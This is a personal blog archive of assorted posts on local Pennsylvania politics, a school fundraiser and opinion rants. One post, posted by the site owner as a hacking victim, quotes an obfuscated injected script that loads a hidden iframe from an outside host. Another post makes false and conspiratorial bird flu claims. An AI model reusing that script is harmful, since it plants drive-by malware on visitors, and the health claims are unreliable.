
The Future Of The War Board

Marie DeYoung testifying With the May primary just around the corner, I am wondering what the Republicans in power will do to insure that Republican voters will turn out. Now I realize that in this primary there are few opponents, but things have to be set up for November. On the Democratic side, they have unleashed their big guns, as in Joe Sestak, to unseat the ever popular Curt Weldon. Here's a rundown of the local Dems and what district they represent here in Delaware County. Pennsylvania State House of Representatives District 159 Representative Thaddeus Kirkland District 160 Shawn Diggory District 161 Bryan Lentz District 162 Marilyn Woodman District 163 Marie DeYoung District 164 Casey Roncaglione District 165 Larry Healy District 166 Representative Greg Vitali District 168 Fred Dewey District 185 Representative Bob Donatucci District 191 Representative Ron Waters And here are the Republicans. 160th District Hon. Stephen Barrar 161st District Hon. Thomas P. Gannon 162nd District Hon. Ron Raymond 163rd District Hon. Nicholas A. Micozzie 164th District Hon. Mario J. Civera 165th District Hon. William F. Adolph, Jr. 168th District Hon. Thomas H. Killion Now out of these only two matter to me. The 163 and the 164 Districts. My mother in Upper Darby and myself in Clifton Heights. So who am I voting for? I never heard of Marie DeYoung, So I "googled" her. Impressive to say the least. Former Army Chaplin, whistleblower of Halliburton, Local educator. Here's her web site. http://mariedeyoung.com/ Now in Nick Micozzie's defense I will say that both myself and others have gone to him for help for various issues and he has responded positively. In any case because of the "let's vote ourself a pay increase last summer" come this November I think Nick and the others has their work cut out for them.


If You Gotta Fly

This is the only way to go...

I'm A Trashman

Things are turning ugly over at the Haverford Blog. Actually, it's entertaining. Notice the time of day these guys post and at over 34,000 reads, the most read thread on the blog.On a side note, My buddy Steve Ross and I a song about Trashmen (His Dad was one) back in the early eighties: And it goes like this: Awake in the morning, Out in the sun, Picking up trash,yeah it has to get done. Well noon time arrives and it's into the bar, I dance with the women, they think I'm a star but I'm a trashman... Feeling unclean! I'm I trashman, I'm so bad and mean. I'm a trashman.. I look like a slob! I'm a trashman, but I need my job. It's afternoon now, and I am so bored.. But I need this job, yes it has to be endured. Look at this trash, it's such a disgrace, Eating all this garbage and it leaves a bad taste, Well I'm I trashman, I'm so bad and mean. I'm a trashman..I look like a slob! I'm a trashman, but I need my job. There was more to it, but I can't remember it all. Oh well. Cheers.


Bored Silly

I am nerdier than 48% of all people. Are you nerdier? Click here to find out!

Bird Flu - Scaredy Cat

You cannot contract the "Bird" flu from another human. Or, even from a bird, Much less a frigging Cat. So why did all these Microbiologists die under suspect causes since 2001? So why am I awake at this hour? I am throwing up. Must be some sort of stomach bug.

Time For A Change In America

Well? Are not you all fed up? Or mis-informed? Raped by other countries, Americans are fast becoming third rate humans on this planet. Forget about your political party, they care NOTHING about you, the individual. Or your family. It's all about the machine, a machine that is out of control. From the local level here in Delco, to the state and national level, We are "dumbed down" so to speak by the MSM. The war on "Terror"? like the war on "Drugs"? Who benefits? I'll answer that. The ones who put the "machine" in place and running. Been that way for over 200 years, with no sign of slowing down. Sleep Tight..


More Hackers - Who's Side Are They On?

It appears that our web site has been yet hacked again. Here's the crap that is on every html page on here. (Over 700) script language="javascript">eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%61%74%65%63%68%2E%63%6F%2E%6B%72%2F%6D%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B'))/script. Update: I called Ipowerweb three times, the last being this morning. They concur that the "Script" is a virus, and that it's up to me to remove the code. So now what? Delete everything? Or sit here all day and manually go through several hundered pages? I have a feeling that someone who does not like my political views is behind this. The good thing is that i saved my referer logs and should be able to spot where and when they did this. Also, where's there's smoke, there's fire. I have to password protect the whole site in the meantime, as not to spread this virus. To the person(s) who are behind this, you"ll get yours, not from me, but from bad karma. It 's a given. P.S. I managed to delete the code from the blog by republishing it entirely from Blogger. As for the rest of the site, I will delete and start anew.


I Believe In Saint Cyril School

Class Of 1975 I went to Saint Cyrils in the Sixties and Seventies. Growing up in the Stonehurst section of Upper Darby, Our parish was St.Carthages on cobbs creek parkway. In the early 60's, St Cyril took over as our new parish. I have both fond and not so fond memories of St. Cyrils, such as Sister Herman Joseph, and Dirk Slater. Anyway, one of the things I did learn was disipline, like you can see that in my blog posts. All in all our School was the best. I remember the May Procession, Father O'Donnell, Mr. Doyle, Miss Hess, Sister Adrian, Mother Superior,The Social Hall, etc, etc. I loved and still love my old school. Now, Saint Cyril of Alexandria is slated to close unless the school comes up with a quarter of a million dollars by March 31st. How I found Out About This How I found out about this was through the Daily Times a few weeks ago. Also, Paul Thomas, owner of Thomas's Cafe, has taken great steps to help out. The young man who started this whole thing is Tommy Geromichalos. Quote about him from St.Cyril's web site below. "Inspired by 12 year old Tommy Geromichalos, and aided by a series of articles in the Delaware County Daily Times, the parish held a meeting Wednesday night, January 25th to start an effort to raise the $200,000 needed by March 31, 2006. Tommy has Cystic Fibrosis and wrote a letter to the Make-A Wish Foundation" So I was thinking at this late hour how to help. Call Oprah? Send out e-mails? Ask Congress to intervene? How about Curt Weldon? All these things would not help. What would help at this point is nothing short of a miracle. And Tommy is asking for one. I think he deserves it... P.S. I believe that if every person who ever went to Saint Cyrils donated five dollars they could easily reach their goal. Do the math. 1000 students per year X 50 years (1955 -2005) X 5 = 250,000. Now I may be wrong about the total number of students to have ever attended St Cyrils, but I failed to mention that I also learned how to dream. Cheers.


But Let's Cut Medicare

To think that 8 BILLION dollars could just disappear, makes my blood boil. What bs excuse will TPTB use this time? Anyway, be sure to watch 60 Minutes this Sunday, Feb 12, at 7 p.m. Eastern Time. Be sure to check your TV guide for listings in your area.


Out. Of. Control.

Some will see this as a sticky situation. Some will see it as an abvious insult. Some will see it as an obvious over-reaction. I belive in free speach. I believe newspapers can print what they want and people in return have the right to not buy it. I believe the FCC shouldn't be so tough on radio jocks like Stern since people have a choice. People can turn it off. Why are there people out in this world who don't understand that? Everything should be filtered and filtered and held to some standard? Hey people, don't like it? Turn. It. Off. Think some music is offensive? Don't freaking buy it! Don't let your kid buy it! Think some tv show is offensive? Don't freaking watch it! Don't like a radio show? Turn the freaking dial! This whole cartoon thing. I get it that a certain population is all pissed off at this representation of whom they believe as a prophet. But where do they get off? Jokes, caricatures, etc, is never shoved down the face of catholics? buddhists? jews? I'm not talking just about the type of people I'm talking about the idols they worship. We all know of the many many many jewish jokes that don't have to do with that which they hold as higher powers but there in fact ones that do poke fun at such an idol. What I love most is this perception that its a government's fault. This idea that governments should be controlling newspapers and ensuring what they print will not offend anyone in the world at all. This is what happens when a religion becomes a political system. Yeah burn the Danish flag because a newspaper printed a story. Yeah that makes sense. Its so hypocritical. Iran is out there bashing everyone through their government run papers and advertisements. Not just the US but everyone. The people, the political system, the religions...everyone. But now the shoe is on the other foot and there's nothing but outrage? Kudos to all of the other newspapers in the many other nations that ran the same cartoon. Jeers to the US for condeming the cartoon (Jee that's not some obvious plow to get a certain population on your good side? Come on be creative at least). Oh and I really loved it when papers ran the offensive cartoon just to 'show the people the offensive cartoon'. Yyyyeeaaahhh. That's why you did it. Ssssuuurree. Not reaching trying to get the alrighty buck there are ya? No not at all.